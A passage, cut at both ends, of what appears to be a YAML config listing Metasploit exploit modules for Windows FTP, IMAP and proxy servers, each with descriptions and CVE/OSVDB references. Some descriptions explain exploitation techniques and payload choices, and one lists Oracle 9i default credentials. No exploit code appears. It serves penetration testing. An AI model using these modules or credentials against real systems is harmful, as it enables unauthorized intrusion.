\t\t\t\t'fixing' the return address post-exploitation. See references for more information.\n\
\t\t\t"
authors:
- - OSVDB
- "62134"
- - URL
- http://www.exploit-db.com/exploits/12044/
- - URL
- http://www.exploit-db.com/exploits/14399/
path: extensions/metasploit/
class: Msf_module
msf_ftppad_list_reply:
enable: true
msf: true
msf_key: windows/ftp/ftppad_list_reply
name: FTPPad 1.2.0 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow FTPPad 1.2.0 ftp client. The overflow is\n\
\t\t\t\ttriggered when the client connects to a FTP server which sends an overly long directory\n\
\t\t\t\tand filename in response to a LIST command.\n\n\
\t\t\t\tThis will cause an access violation, and will eventually overwrite the saved extended\n\
\t\t\t\tinstruction pointer. Payload can be found at EDX+5c and ESI+5c, so a little pivot/\n\
\t\t\t\tsniper was needed to make this one work.\n\
\t\t\t"
authors:
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_aasync_list_reply:
enable: true
msf: true
msf_key: windows/ftp/aasync_list_reply
name: AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in AASync v2.2.1.0, triggered when\n\
\t\t\t\tprocessing the response on a LIST command. During the overflow, a structured exception\n\
\t\t\t\thandler record gets overwritten.\n\
\t\t\t"
authors:
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_wsftp_server_505_xmd5:
enable: true
msf: true
msf_key: windows/ftp/wsftp_server_505_xmd5
name: Ipswitch WS_FTP Server 5.05 XMD5 Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the XMD5 verb in\n\
\t\t\t\tIPSWITCH WS_FTP Server 5.05.\n\
\t\t\t"
authors:
- - CVE
- 2006-4847
- - OSVDB
- "28939"
- - BID
- "20076"
path: extensions/metasploit/
class: Msf_module
msf_goldenftp_pass_bof:
enable: true
msf: true
msf_key: windows/ftp/goldenftp_pass_bof
name: GoldenFTP PASS Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the Golden FTP service, using the PASS\n\
\t\t\t\tcommand to cause a buffer overflow. Please note that in order trigger the vulnerable\n\
\t\t\t\tcode, the victim machine must have the \"Show new connections\" setting enabled. By\n\
\t\t\t\tdefault, this option is unchecked.\n\
\t\t\t"
authors:
- - CVE
- 2006-6576
- - OSVDB
- "35951"
- - BID
- "45957 "
- - URL
- http://www.exploit-db.com/exploits/16036/
path: extensions/metasploit/
class: Msf_module
msf_warftpd_165_user:
enable: true
msf: true
msf_key: windows/ftp/warftpd_165_user
name: War-FTPD 1.65 Username Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow found in the USER command\n\
\t\t\t\tof War-FTPD 1.65.\n\
\t\t\t"
authors:
- - CVE
- 1999-0256
- - OSVDB
- "875"
- - BID
- "10078"
- - URL
- http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html
path: extensions/metasploit/
class: Msf_module
msf_sami_ftpd_user:
enable: true
msf: true
msf_key: windows/ftp/sami_ftpd_user
name: KarjaSoft Sami FTP Server v2.02 USER Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the KarjaSoft Sami FTP Server version 2.02\n\
\t\t\t\tby sending an excessively long USER string. The stack is overwritten\n\
\t\t\t\twhen the administrator attempts to view the FTP logs. Therefore, this exploit\n\
\t\t\t\tis passive and requires end-user interaction. Keep this in mind when selecting\n\
\t\t\t\tpayloads. When the server is restarted, it will re-execute the exploit until\n\
\t\t\t\tthe logfile is manually deleted via the file system.\n\
\t\t\t"
authors:
- - CVE
- 2006-0441
- - CVE
- 2006-2212
- - OSVDB
- "25670"
- - BID
- "16370"
- - BID
- "22045"
- - BID
- "17835"
- - URL
- http://www.milw0rm.com/exploits/1448
- - URL
- http://www.milw0rm.com/exploits/1452
- - URL
- http://www.milw0rm.com/exploits/1462
- - URL
- http://www.milw0rm.com/exploits/3127
- - URL
- http://www.milw0rm.com/exploits/3140
path: extensions/metasploit/
class: Msf_module
msf_oracle9i_xdb_ftp_unlock:
enable: true
msf: true
msf_key: windows/ftp/oracle9i_xdb_ftp_unlock
name: Oracle 9i XDB FTP UNLOCK Overflow (win32)
category: Metasploit
description: "\n\
\t\t\t\t\tBy passing an overly long token to the UNLOCK command, a\n\
\t\t\t\tstack based buffer overflow occurs. David Litchfield, has\n\
\t\t\t\tillustrated multiple vulnerabilities in the Oracle 9i XML\n\
\t\t\t\tDatabase (XDB), during a seminar on \"Variations in exploit\n\
\t\t\t\tmethods between Linux and Windows\" presented at the Blackhat\n\
\t\t\t\tconference. Oracle9i includes a number of default accounts,\n\
\t\t\t\tincluding dbsnmp:dbsmp, scott:tiger, system:manager, and\n\
\t\t\t\tsys:change_on_install.\n\
\t\t\t"
authors:
- - CVE
- 2003-0727
- - OSVDB
- "2449"
- - BID
- "8375"
- - URL
- http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf
path: extensions/metasploit/
class: Msf_module
msf_leapftp_list_reply:
enable: true
msf: true
msf_key: windows/ftp/leapftp_list_reply
name: LeapFTP 3.0.1 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the LeapFTP 3.0.1 client.\n\
\t\t\t\tThis issue is triggered when a file with a long name is downloaded/opened.\n\
\t\t\t"
authors:
- - OSVDB
- "68640"
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_trellian_client_pasv:
enable: true
msf: true
msf_key: windows/ftp/trellian_client_pasv
name: Trellian FTP Client 3.01 PASV Remote Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered\n\
\t\t\t\tthrough an excessively long PASV message.\n\
\t\t\t"
authors:
- - CVE
- 2010-1465
- - OSVDB
- "63812"
- - URL
- http://www.exploit-db.com/exploits/12152
path: extensions/metasploit/
class: Msf_module
msf_vermillion_ftpd_port:
enable: true
msf: true
msf_key: windows/ftp/vermillion_ftpd_port
name: Vermillion FTP Daemon PORT Command Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an out-of-bounds array access in the Arcane Software\n\
\t\t\t\tVermillion FTP server. By sending an specially crafted FTP PORT command,\n\
\t\t\t\tan attacker can corrupt stack memory and execute arbitrary code.\n\n\
\t\t\t\tThis particular issue is caused by processing data bound by attacker\n\
\t\t\t\tcontrolled input while writing into a 4 byte stack buffer. Unfortunately,\n\
\t\t\t\tthe writing that occurs is not a simple byte copy.\n\n\
\t\t\t\tProcessing is done using a source ptr (p) and a destination pointer (q).\n\
\t\t\t\tThe vulnerable function walks the input string and continues while the\n\
\t\t\t\tsource byte is non-null. If a comma is encountered, the function increments\n\
\t\t\t\tthe the destination pointer. If an ascii digit [0-9] is encountered, the\n\
\t\t\t\tfollowing occurs:\n\n\
\t\t\t\t\t*q = (*q * 10) + (*p - '0');\n\n\
\t\t\t\tAll other input characters are ignored in this loop.\n\n\
\t\t\t\tAs a consequence, an attacker must craft input such that modifications\n\
\t\t\t\tto the current values on the stack result in usable values. In this exploit,\n\
\t\t\t\tthe low two bytes of the return address are adjusted to point at the\n\
\t\t\t\tlocation of a 'call edi' instruction within the binary. This was chosen\n\
\t\t\t\tsince 'edi' points at the source buffer when the function returns.\n\n\
\t\t\t\tNOTE: This server can be installed as a service using \"vftpd.exe install\".\n\
\t\t\t\tIf so, the service does not restart automatically, giving an attacker only\n\
\t\t\t\tone attempt.\n\
\t\t\t"
authors:
- - OSVDB
- "62163"
- - URL
- http://www.exploit-db.com/exploits/11293
- - URL
- http://www.global-evolution.info/news/files/vftpd/vftpd.txt
path: extensions/metasploit/
class: Msf_module
msf_cesarftp_mkd:
enable: true
msf: true
msf_key: windows/ftp/cesarftp_mkd
name: Cesar FTP 0.99g MKD Command Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.\n\n\
\t\t\t\tYou must have valid credentials to trigger this vulnerability. Also, you\n\
\t\t\t\tonly get one chance, so choose your target carefully.\n\
\t\t\t"
authors:
- - CVE
- 2006-2961
- - OSVDB
- "26364"
- - BID
- "18586"
- - URL
- http://secunia.com/advisories/20574/
path: extensions/metasploit/
class: Msf_module
msf_easyftp_cwd_fixret:
enable: true
msf: true
msf_key: windows/ftp/easyftp_cwd_fixret
name: EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n\
\t\t\t\tand earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which\n\
\t\t\t\tleads to a stack based buffer overflow. EasyFTP allows anonymous access by\n\
\t\t\t\tdefault; valid credentials are typically unnecessary to exploit this vulnerability.\n\n\
\t\t\t\tAfter version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n\
\t\t\t\tThis exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'.\n\
\t\t\t\tThis code allows us to inject of payload of ~500 bytes into a 264 byte buffer by\n\
\t\t\t\t'fixing' the return address post-exploitation. See references for more information.\n\
\t\t\t"
authors:
- - OSVDB
- "62134"
- - URL
- http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/
- - URL
- http://paulmakowski.wordpress.com/2010/04/19/metasploit-plugin-for-easyftp-server-exploit
- - URL
- http://seclists.org/bugtraq/2010/Feb/202
- - URL
- http://code.google.com/p/easyftpsvr/
- - URL
- https://tegosecurity.com/etc/return_overwrite/RCE_easy_ftp_server_1.7.0.2.zip
- - URL
- http://www.securityfocus.com/bid/38262/exploit
path: extensions/metasploit/
class: Msf_module
msf_wsftp_server_503_mkd:
enable: true
msf: true
msf_key: windows/ftp/wsftp_server_503_mkd
name: WS-FTP Server 5.03 MKD Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits the buffer overflow found in the MKD\n\
\t\t\t\tcommand in IPSWITCH WS_FTP Server 5.03 discovered by Reed\n\
\t\t\t\tArvin.\n\
\t\t\t"
authors:
- - CVE
- 2004-1135
- - OSVDB
- "12509"
- - BID
- "11772"
path: extensions/metasploit/
class: Msf_module
msf_ms09_053_ftpd_nlst:
enable: true
msf: true
msf_key: windows/ftp/ms09_053_ftpd_nlst
name: Microsoft IIS FTP Server NLST Response Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow flaw in the Microsoft IIS FTP\n\
\t\t\t\tservice. The flaw is triggered when a special NLST argument is passed\n\
\t\t\t\twhile the session has changed into a long directory path. For this exploit\n\
\t\t\t\tto work, the FTP server must be configured to allow write access to the\n\
\t\t\t\tfile system (either anonymously or in conjunction with a real account)\n\
\t\t\t"
authors:
- - URL
- http://milw0rm.com/exploits/9541
- - CVE
- 2009-3023
- - OSVDB
- "57589"
- - BID
- "36189"
- - MSB
- MS09-053
path: extensions/metasploit/
class: Msf_module
msf_xlink_server:
enable: true
msf: true
msf_key: windows/ftp/xlink_server
name: Xlink FTP Server Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Xlink FTP Server\n\
\t\t\t\tthat comes bundled with Omni-NFS Enterprise 5.2.\n\
\t\t\t\tWhen a overly long FTP request is sent to the server,\n\
\t\t\t\tarbitrary code may be executed.\n\
\t\t\t"
authors:
- - CVE
- 2006-5792
- - OSVDB
- "58646"
- - URL
- http://www.metasploit.com/
- - URL
- http://www.xlink.com
path: extensions/metasploit/
class: Msf_module
msf_seagull_list_reply:
enable: true
msf: true
msf_key: windows/ftp/seagull_list_reply
name: Seagull FTP v3.3 build 409 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the Seagull FTP client that gets\n\
\t\t\t\ttriggered when the ftp clients processes a response to a LIST command. If the\n\
\t\t\t\tresponse contains an overly long file/folder name, a buffer overflow occurs,\n\
\t\t\t\toverwriting a structured exception handler.\n\
\t\t\t"
authors:
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_warftpd_165_pass:
enable: true
msf: true
msf_key: windows/ftp/warftpd_165_pass
name: War-FTPD 1.65 Password Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits the buffer overflow found in the PASS command\n\
\t\t\t\tin War-FTPD 1.65. This particular module will only work\n\
\t\t\t\treliably against Windows 2000 targets. The server must be\n\
\t\t\t\tconfigured to allow anonymous logins for this exploit to\n\
\t\t\t\tsucceed. A failed attempt will bring down the service\n\
\t\t\t\tcompletely.\n\
\t\t\t"
authors:
- - CVE
- 1999-0256
- - OSVDB
- "875"
- - BID
- "10078"
- - URL
- http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html
path: extensions/metasploit/
class: Msf_module
msf_sasser_ftpd_port:
enable: true
msf: true
msf_key: windows/ftp/sasser_ftpd_port
name: Sasser Worm avserve FTP PORT Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the FTP server component of the Sasser worm.\n\
\t\t\t\tBy sending an overly long PORT command the stack can be overwritten.\n\
\t\t\t"
authors:
- - OSVDB
- "6197"
path: extensions/metasploit/
class: Msf_module
msf_leapftp_pasv_reply:
enable: true
msf: true
msf_key: windows/ftp/leapftp_pasv_reply
name: LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600\n\
\t\t\t\tclient that is triggered through an excessively long PASV reply command. This\n\
\t\t\t\tmodule was ported from the original exploit by drG4njubas with minor improvements.\n\
\t\t\t"
authors:
- - CVE
- 2003-0558
- - OSVDB
- "4587"
- - BID
- "7860"
- - URL
- http://www.milw0rm.com/exploits/54
path: extensions/metasploit/
class: Msf_module
msf_gekkomgr_list_reply:
enable: true
msf: true
msf_key: windows/ftp/gekkomgr_list_reply
name: Gekko Manager FTP Client Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Gekko Manager ftp client, triggered when\n\
\t\t\t\tprocessing the response received after sending a LIST request. If this response contains\n\
\t\t\t\ta long filename, a buffer overflow occurs, overwriting a structured exception handler.\n\
\t\t\t"
authors:
- - OSVDB
- "68641"
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_ftpgetter_pwd_reply:
enable: true
msf: true
msf_key: windows/ftp/ftpgetter_pwd_reply
name: FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in FTPGetter Standard v3.55.0.05 ftp client.\n\
\t\t\t\tWhen processing the response on a PWD command, a stack based buffer overflow occurs.\n\
\t\t\t\tThis leads to arbitrary code execution when a structured exception handler gets\n\
\t\t\t\toverwritten.\n\
\t\t\t"
authors:
- - OSVDB
- "68638"
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_netterm_netftpd_user:
enable: true
msf: true
msf_key: windows/ftp/netterm_netftpd_user
name: NetTerm NetFTPD USER Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the NetTerm NetFTPD\n\
\t\t\t\tapplication. This package is part of the NetTerm package.\n\
\t\t\t\tThis module uses the USER command to trigger the overflow.\n\
\t\t\t"
authors:
- - CVE
- 2005-1323
- - OSVDB
- "15865"
- - URL
- http://seclists.org/lists/fulldisclosure/2005/Apr/0578.html
- - BID
- "13396"
path: extensions/metasploit/
class: Msf_module
msf_freeftpd_user:
enable: true
msf: true
msf_key: windows/ftp/freeftpd_user
name: freeFTPd 1.0 Username Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the freeFTPd\n\
\t\t\t\tmulti-protocol file transfer service. This flaw can only be\n\
\t\t\t\texploited when logging has been enabled (non-default).\n\
\t\t\t"
authors:
- - CVE
- 2005-3683
- - OSVDB
- "20909"
- - BID
- "15457"
- - URL
- http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html
path: extensions/metasploit/
class: Msf_module
msf_servu_mdtm:
enable: true
msf: true
msf_key: windows/ftp/servu_mdtm
name: Serv-U FTPD MDTM Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for the Serv-U\\'s MDTM command timezone\n\
\t\t\t\toverflow. It has been heavily tested against versions\n\
\t\t\t\t4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against\n\
\t\t\t\tnt4/2k/xp/2k3. I have also had success against version 3,\n\
\t\t\t\tbut only tested 1 version/os. The bug is in all versions\n\
\t\t\t\tprior to 5.0.0.4, but this exploit will not work against\n\
\t\t\t\tversions not listed above. You only get one shot, but it\n\
\t\t\t\tshould be OS/SP independent.\n\n\
\t\t\t\tThis exploit is a single hit, the service dies after the\n\
\t\t\t\tshellcode finishes execution.\n\
\t\t\t"
authors:
- - CVE
- 2004-0330
- - OSVDB
- "4073"
- - URL
- http://archives.neohapsis.com/archives/bugtraq/2004-02/0654.html
- - URL
- http://www.cnhonker.com/advisory/serv-u.mdtm.txt
- - URL
- http://www.cnhonker.com/index.php?module=releases&act=view&type=3&id=54
- - BID
- "9751"
path: extensions/metasploit/
class: Msf_module
msf_mercur_imap_select_overflow:
enable: true
msf: true
msf_key: windows/imap/mercur_imap_select_overflow
name: Mercur v5.0 IMAP SP3 SELECT Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tMercur v5.0 IMAP server is prone to a remotely exploitable\n\
\t\t\t\tstack-based buffer overflow vulnerability. This issue is due\n\
\t\t\t\tto a failure of the application to properly bounds check\n\
\t\t\t\tuser-supplied data prior to copying it to a fixed size memory buffer.\n\
\t\t\t\tCredit to Tim Taylor for discover the vulnerability.\n\
\t\t\t"
authors:
- - CVE
- 2006-1255
- - OSVDB
- "23950"
- - BID
- "17138"
path: extensions/metasploit/
class: Msf_module
msf_eudora_list:
enable: true
msf: true
msf_key: windows/imap/eudora_list
name: Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server\n\
\t\t\t\tversion 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this\n\
\t\t\t\tparticular vulnerability.\n\n\
\t\t\t\tNOTE: The service does NOT restart automatically by default. You may be limited to\n\
\t\t\t\tonly one attempt, so choose wisely!\n\
\t\t\t"
authors:
- - CVE
- 2005-4267
- - OSVDB
- "22097"
- - BID
- "15980"
path: extensions/metasploit/
class: Msf_module
msf_mailenable_w3c_select:
enable: true
msf: true
msf_key: windows/imap/mailenable_w3c_select
name: MailEnable IMAPD W3C Logging Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the W3C logging\n\
\t\t\t\tfunctionality of the MailEnable IMAPD service. Logging is\n\
\t\t\t\tnot enabled by default and this exploit requires a valid\n\
\t\t\t\tusername and password to exploit the flaw. MailEnable\n\
\t\t\t\tProfessional version 1.6 and prior and MailEnable Enterprise\n\
\t\t\t\tversion 1.1 and prior are affected.\n\
\t\t\t"
authors:
- - CVE
- 2005-3155
- - OSVDB
- "19842"
- - BID
- "15006"
path: extensions/metasploit/
class: Msf_module
msf_mdaemon_fetch:
enable: true
msf: true
msf_key: windows/imap/mdaemon_fetch
name: MDaemon 9.6.4 IMAPD FETCH Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Alt-N MDaemon IMAP Server\n\
\t\t\t\tversion 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP\n\
\t\t\t\taccount credentials are required. Credit to Matteo Memelli\n\
\t\t\t"
authors:
- - CVE
- 2008-1358
- - OSVDB
- "43111"
- - BID
- "28245"
- - URL
- http://www.milw0rm.com/exploits/5248
path: extensions/metasploit/
class: Msf_module
msf_novell_netmail_subscribe:
enable: true
msf: true
msf_key: windows/imap/novell_netmail_subscribe
name: Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE\n\
\t\t\t\tverb. By sending an overly long string, an attacker can overwrite the\n\
\t\t\t\tbuffer and control program execution.\n\
\t\t\t"
authors:
- - CVE
- 2006-6761
- - OSVDB
- "31360"
- - BID
- "21728"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=454
path: extensions/metasploit/
class: Msf_module
msf_novell_netmail_auth:
enable: true
msf: true
msf_key: windows/imap/novell_netmail_auth
name: Novell NetMail <=3.52d IMAP AUTHENTICATE Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE\n\
\t\t\t\tGSSAPI command. By sending an overly long string, an attacker can overwrite the\n\
\t\t\t\tbuffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp\n\
\t\t\t\tor windows/shell_reverse_tcp allows for the most reliable results.\n\
\t\t\t"
authors:
- - OSVDB
- "55175"
- - URL
- http://www.w00t-shell.net/#
path: extensions/metasploit/
class: Msf_module
msf_mailenable_status:
enable: true
msf: true
msf_key: windows/imap/mailenable_status
name: MailEnable IMAPD (1.54) STATUS Request Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tMailEnable's IMAP server contains a buffer overflow\n\
\t\t\t\tvulnerability in the STATUS command. With proper\n\
\t\t\t\tcredentials, this could allow for the execution of arbitrary\n\
\t\t\t\tcode.\n\
\t\t\t"
authors:
- - CVE
- 2005-2278
- - OSVDB
- "17844"
- - BID
- "14243"
- - NSS
- "19193"
path: extensions/metasploit/
class: Msf_module
msf_mdaemon_cram_md5:
enable: true
msf: true
msf_key: windows/imap/mdaemon_cram_md5
name: Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the CRAM-MD5\n\
\t\t\t\tauthentication of the MDaemon IMAP service. This\n\
\t\t\t\tvulnerability was discovered by Muts.\n\
\t\t\t"
authors:
- - CVE
- 2004-1520
- - OSVDB
- "11838"
- - BID
- "11675"
path: extensions/metasploit/
class: Msf_module
msf_novell_netmail_status:
enable: true
msf: true
msf_key: windows/imap/novell_netmail_status
name: Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP STATUS\n\
\t\t\t\tverb. By sending an overly long string, an attacker can overwrite the\n\
\t\t\t\tbuffer and control program execution.\n\
\t\t\t"
authors:
- - CVE
- 2005-3314
- - OSVDB
- "20956"
- - BID
- "15491"
path: extensions/metasploit/
class: Msf_module
msf_mercury_login:
enable: true
msf: true
msf_key: windows/imap/mercury_login
name: Mercury/32 <= 4.01b LOGIN Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD\n\
\t\t\t\tLOGIN verb. By sending a specially crafted login command, a buffer\n\
\t\t\t\tis corrupted, and code execution is possible. This vulnerability was\n\
\t\t\t\tdiscovered by (mu-b at digit-labs.org).\n\
\t\t\t"
authors:
- - CVE
- 2007-1373
- - OSVDB
- "33883"
path: extensions/metasploit/
class: Msf_module
msf_mailenable_login:
enable: true
msf: true
msf_key: windows/imap/mailenable_login
name: MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tMailEnable's IMAP server contains a buffer overflow\n\
\t\t\t\tvulnerability in the Login command.\n\
\t\t\t"
authors:
- - CVE
- 2006-6423
- - OSVDB
- "32125"
- - BID
- "21492"
- - URL
- http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051229.html
path: extensions/metasploit/
class: Msf_module
msf_ipswitch_search:
enable: true
msf: true
msf_key: windows/imap/ipswitch_search
name: Ipswitch IMail IMAP SEARCH Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH\n\
\t\t\t\tverb. By sending an overly long string, an attacker can overwrite the\n\
\t\t\t\tbuffer and control program execution.\n\
\t\t\t\tIn order for this module to be successful, the IMAP user must have at least one\n\
\t\t\t\tmessage.\n\
\t\t\t"
authors:
- - CVE
- 2007-3925
- - OSVDB
- "36219"
- - BID
- "24962"
path: extensions/metasploit/
class: Msf_module
msf_mercury_rename:
enable: true
msf: true
msf_key: windows/imap/mercury_rename
name: Mercury/32 v4.01a IMAP RENAME Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow vulnerability in the\n\
\t\t\t\tMercury/32 v.4.01a IMAP service.\n\
\t\t\t"
authors:
- - CVE
- 2004-1211
- - OSVDB
- "12508"
- - BID
- "11775"
- - NSS
- "15867"
path: extensions/metasploit/
class: Msf_module
msf_novell_netmail_append:
enable: true
msf: true
msf_key: windows/imap/novell_netmail_append
name: Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND\n\
\t\t\t\tverb. By sending an overly long string, an attacker can overwrite the\n\
\t\t\t\tbuffer and control program execution.\n\
\t\t\t"
authors:
- - CVE
- 2006-6425
- - OSVDB
- "31362"
- - BID
- "21723"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-06-054.html
path: extensions/metasploit/
class: Msf_module
msf_mercur_login:
enable: true
msf: true
msf_key: windows/imap/mercur_login
name: Mercur Messaging 2005 IMAP Login Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3.\n\
\t\t\t\tSince the room for shellcode is small, using the reverse ordinal payloads\n\
\t\t\t\tyields the best results.\n\
\t\t\t"
authors:
- - CVE
- 2006-1255
- - OSVDB
- "23950"
- - BID
- "17138"
- - URL
- http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1104.html
path: extensions/metasploit/
class: Msf_module
msf_imail_delete:
enable: true
msf: true
msf_key: windows/imap/imail_delete
name: IMail IMAP4D Delete Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the 'DELETE'\n\
\t\t\t\tcommand of the the IMail IMAP4D service. This vulnerability\n\
\t\t\t\tcan only be exploited with a valid username and password.\n\
\t\t\t\tThis flaw was patched in version 8.14.\n\
\t\t\t"
authors:
- - CVE
- 2004-1520
- - OSVDB
- "11838"
- - BID
- "11675"
path: extensions/metasploit/
class: Msf_module
msf_ccproxy_telnet_ping:
enable: true
msf: true
msf_key: windows/proxy/ccproxy_telnet_ping
name: CCProxy <= v6.2 Telnet Proxy Ping Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the YoungZSoft CCProxy <= v6.2 suite\n\
\t\t\t\tTelnet service. The stack is overwritten when sending an overly\n\
\t\t\t\tlong address to the 'ping' command.\n\
\t\t\t"
authors:
- - CVE
- 2004-2416
- - OSVDB
- "11593"
- - BID
- "11666 "
- - URL
- http://milw0rm.com/exploits/621
path: extensions/metasploit/
class: Msf_module
msf_qbik_wingate_wwwproxy:
enable: true
msf: true
msf_key: windows/proxy/qbik_wingate_wwwproxy
name: Qbik WinGate WWW Proxy Server URL Processing Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Qbik WinGate version\n\
\t\t\t\t6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the\n\
\t\t\t\tHTTP proxy service on port 80, a remote attacker could overflow\n\
\t\t\t\ta buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-2926
- - OSVDB
- "26214"
- - BID
- "18312"
path: extensions/metasploit/
class: Msf_module
msf_proxypro_http_get:
enable: true
msf: true
msf_key: windows/proxy/proxypro_http_get
name: Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Proxy-Pro Professional\n\
\t\t\t\tGateKeeper 4.7. By sending a long HTTP GET to the default port\n\
\t\t\t\tof 3128, a remote attacker could overflow a buffer and execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2004-0326
- - OSVDB
- "4027"
- - BID
- "9716"
path: extensions/metasploit/
class: Msf_module
msf_bluecoat_winproxy_host:
enable: true
msf: true
msf_key: windows/proxy/bluecoat_winproxy_host
name: Blue Coat WinProxy Host Header Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the Blue Coat Systems WinProxy\n\
\t\t\t\tservice by sending a long port value for the Host header in a HTTP\n\
\t\t\t\trequest.\n\
\t\t\t"
authors:
- - CVE
- 2005-4085
- - OSVDB
- "22238"
- - BID
- "16147"
- - URL
- http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html
path: extensions/metasploit/
class: Msf_module
msf_maxdb_webdbm_get_overflow:
enable: true
msf: true
msf_key: windows/http/maxdb_webdbm_get_overflow
name: MaxDB WebDBM GET Buffer Overflow
